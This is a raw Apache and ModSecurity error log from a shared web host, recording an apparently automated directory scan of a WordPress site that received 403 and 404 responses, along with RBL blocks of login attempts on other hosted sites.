[Tue May 26 13:33:30.818269 2026] [autoindex:error] [pid 512745:tid 512910] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:30.818933 2026] [security2:error] [pid 512745:tid 512910] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0nKSB_s2CvZg7xN-igAAAS0"]
[Tue May 26 13:33:31.010933 2026] [cgid:error] [pid 512745:tid 512947] [client 185.104.184.206:48598] AH01265: stderr from /home1/cicode9a/public_html/cgi-bin/: attempt to invoke directory as script
[Tue May 26 13:33:31.011683 2026] [security2:error] [pid 512745:tid 512947] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0nKSB_s2CvZg7xN-jwAAAVI"]
[Tue May 26 13:33:31.203073 2026] [security2:error] [pid 512745:tid 512907] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT03KSB_s2CvZg7xN-lgAAASo"]
[Tue May 26 13:33:31.285644 2026] [security2:error] [pid 512745:tid 512871] [remote 84.247.181.196:50960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVT03KSB_s2CvZg7xN-kAABVn0"]
[Tue May 26 13:33:31.391401 2026] [security2:error] [pid 512745:tid 512909] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT03KSB_s2CvZg7xN-mQAAASw"]
[Tue May 26 13:33:31.611113 2026] [security2:error] [pid 512745:tid 512974] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT03KSB_s2CvZg7xN-nQAAAW0"]
[Tue May 26 13:33:31.804259 2026] [security2:error] [pid 512745:tid 512932] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT03KSB_s2CvZg7xN-ngAAAUM"]
[Tue May 26 13:33:32.088829 2026] [security2:error] [pid 512745:tid 512885] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1HKSB_s2CvZg7xN-oQAAARQ"]
[Tue May 26 13:33:32.296275 2026] [security2:error] [pid 512745:tid 512985] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1HKSB_s2CvZg7xN-owAAAXg"]
[Tue May 26 13:33:32.488095 2026] [security2:error] [pid 512745:tid 512963] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1HKSB_s2CvZg7xN-pQAAAWI"]
[Tue May 26 13:33:32.535589 2026] [security2:error] [pid 512344:tid 512392] [remote 45.250.255.226:56436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "hassina-foundation.com"] [uri "/wp-login.php"] [unique_id "ahVT1MbElyei4S77DQcRZgAAHy8"]
[Tue May 26 13:33:32.694526 2026] [security2:error] [pid 512745:tid 512997] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1HKSB_s2CvZg7xN-qAAAAYQ"]
[Tue May 26 13:33:32.915810 2026] [security2:error] [pid 512745:tid 512923] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1HKSB_s2CvZg7xN-qQAAATo"]
[Tue May 26 13:33:33.130886 2026] [security2:error] [pid 512745:tid 512944] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1XKSB_s2CvZg7xN-qwAAAU8"]
[Tue May 26 13:33:33.301711 2026] [security2:error] [pid 512745:tid 512977] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1XKSB_s2CvZg7xN-rAAAAXA"]
[Tue May 26 13:33:33.481005 2026] [security2:error] [pid 512344:tid 512545] [client 189.223.32.181:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT1cbElyei4S77DQcRcgAAAEc"]
[Tue May 26 13:33:33.499171 2026] [security2:error] [pid 512745:tid 512973] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1XKSB_s2CvZg7xN-rQAAAWw"]
[Tue May 26 13:33:33.693864 2026] [security2:error] [pid 512745:tid 512919] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1XKSB_s2CvZg7xN-tAAAATY"]
[Tue May 26 13:33:33.898490 2026] [security2:error] [pid 512745:tid 512948] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1XKSB_s2CvZg7xN-twAAAVM"]
[Tue May 26 13:33:34.105428 2026] [security2:error] [pid 512745:tid 512954] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1nKSB_s2CvZg7xN-uwAAAVk"]
[Tue May 26 13:33:34.287984 2026] [security2:error] [pid 512745:tid 512959] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1nKSB_s2CvZg7xN-vwAAAV4"]
[Tue May 26 13:33:34.493699 2026] [security2:error] [pid 512745:tid 512912] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1nKSB_s2CvZg7xN-xAAAAS8"]
[Tue May 26 13:33:34.694918 2026] [security2:error] [pid 512745:tid 512888] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1nKSB_s2CvZg7xN-xQAAARc"]
[Tue May 26 13:33:34.901236 2026] [security2:error] [pid 512745:tid 512878] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT1nKSB_s2CvZg7xN-ygAAAQ0"]
[Tue May 26 13:33:35.103974 2026] [security2:error] [pid 512745:tid 512947] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT13KSB_s2CvZg7xN-zQAAAVI"]
[Tue May 26 13:33:35.248934 2026] [security2:error] [pid 512344:tid 512549] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT1sbElyei4S77DQcRjQAAAEs"]
[Tue May 26 13:33:35.292984 2026] [security2:error] [pid 512745:tid 512899] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT13KSB_s2CvZg7xN-zgAAASI"]
[Tue May 26 13:33:35.496787 2026] [security2:error] [pid 512745:tid 512903] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT13KSB_s2CvZg7xN-0AAAASY"]
[Tue May 26 13:33:35.691055 2026] [security2:error] [pid 512745:tid 512951] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT13KSB_s2CvZg7xN-0gAAAVY"]
[Tue May 26 13:33:35.913932 2026] [security2:error] [pid 512745:tid 512921] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT13KSB_s2CvZg7xN-1wAAATg"]
[Tue May 26 13:33:36.096395 2026] [security2:error] [pid 512745:tid 512996] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT2HKSB_s2CvZg7xN-2AAAAYM"]
[Tue May 26 13:33:36.293029 2026] [security2:error] [pid 512745:tid 512898] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT2HKSB_s2CvZg7xN-2gAAASE"]
[Tue May 26 13:33:36.494315 2026] [security2:error] [pid 512745:tid 512932] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT2HKSB_s2CvZg7xN-5AAAAUM"]
[Tue May 26 13:33:36.694956 2026] [security2:error] [pid 512745:tid 512911] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT2HKSB_s2CvZg7xN-5QAAAS4"]
[Tue May 26 13:33:36.890248 2026] [security2:error] [pid 512745:tid 512986] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT2HKSB_s2CvZg7xN-5wAAAXk"]
[Tue May 26 13:33:37.152033 2026] [autoindex:error] [pid 512745:tid 512995] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:37.152721 2026] [security2:error] [pid 512745:tid 512995] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2XKSB_s2CvZg7xN-6QAAAYI"]
[Tue May 26 13:33:37.326914 2026] [security2:error] [pid 512745:tid 512968] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cicodev.org"] [uri "/wp-content/themes/twentytwenty/index.php"] [unique_id "ahVT2XKSB_s2CvZg7xN-7wAAAWc"]
[Tue May 26 13:33:37.683851 2026] [autoindex:error] [pid 512745:tid 512948] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-content/cache/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:37.684565 2026] [security2:error] [pid 512745:tid 512948] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2XKSB_s2CvZg7xN-9wAAAVM"]
[Tue May 26 13:33:37.777532 2026] [security2:error] [pid 512745:tid 512949] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT2XKSB_s2CvZg7xN-8gAAAVQ"]
[Tue May 26 13:33:37.978065 2026] [autoindex:error] [pid 512745:tid 512918] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-admin/maint/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:37.979014 2026] [security2:error] [pid 512745:tid 512918] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2XKSB_s2CvZg7xN-_QAAATU"]
[Tue May 26 13:33:38.201118 2026] [authz_core:error] [pid 512745:tid 512983] [client 185.104.184.206:37412] AH01630: client denied by server configuration: /home1/cicode9a/public_html/wp-content/plugins/akismet/
[Tue May 26 13:33:38.201808 2026] [security2:error] [pid 512745:tid 512983] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2nKSB_s2CvZg7xN-_wAAAXY"]
[Tue May 26 13:33:38.427949 2026] [autoindex:error] [pid 512745:tid 512935] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/assets/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:38.428927 2026] [security2:error] [pid 512745:tid 512935] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2nKSB_s2CvZg7xN_AQAAAUY"]
[Tue May 26 13:33:38.615744 2026] [autoindex:error] [pid 512745:tid 512897] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:38.616410 2026] [security2:error] [pid 512745:tid 512897] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2nKSB_s2CvZg7xN_BgAAASA"]
[Tue May 26 13:33:38.803650 2026] [autoindex:error] [pid 512745:tid 512880] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:38.804292 2026] [security2:error] [pid 512745:tid 512880] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2nKSB_s2CvZg7xN_DAAAAQ8"]
[Tue May 26 13:33:39.013640 2026] [autoindex:error] [pid 512745:tid 512888] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/html-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:39.014366 2026] [security2:error] [pid 512745:tid 512888] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT2nKSB_s2CvZg7xN_DQAAARc"]
[Tue May 26 13:33:39.145582 2026] [security2:error] [pid 512745:tid 512984] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVT2XKSB_s2CvZg7xN-_AABd1Q"]
[Tue May 26 13:33:39.216058 2026] [autoindex:error] [pid 512745:tid 512878] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/js/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:39.216702 2026] [security2:error] [pid 512745:tid 512878] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT23KSB_s2CvZg7xN_EQAAAQ0"]
[Tue May 26 13:33:39.428025 2026] [autoindex:error] [pid 512745:tid 512964] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/php-compat/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:39.428716 2026] [security2:error] [pid 512745:tid 512964] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT23KSB_s2CvZg7xN_FQAAAWM"]
[Tue May 26 13:33:39.585951 2026] [security2:error] [pid 512745:tid 512892] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT23KSB_s2CvZg7xN_DwAAARs"]
[Tue May 26 13:33:39.622324 2026] [autoindex:error] [pid 512745:tid 512994] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:39.622993 2026] [security2:error] [pid 512745:tid 512994] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT23KSB_s2CvZg7xN_FwAAAYE"]
[Tue May 26 13:33:39.807422 2026] [autoindex:error] [pid 512745:tid 512993] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:39.808036 2026] [security2:error] [pid 512745:tid 512993] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT23KSB_s2CvZg7xN_HAAAAYA"]
[Tue May 26 13:33:40.012988 2026] [security2:error] [pid 512745:tid 512900] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT3HKSB_s2CvZg7xN_IAAAASM"]
[Tue May 26 13:33:40.226073 2026] [autoindex:error] [pid 512745:tid 512992] [client 185.104.184.206:37412] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:40.227043 2026] [security2:error] [pid 512745:tid 512992] [client 185.104.184.206:37412] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT3HKSB_s2CvZg7xN_JgAAAX8"]
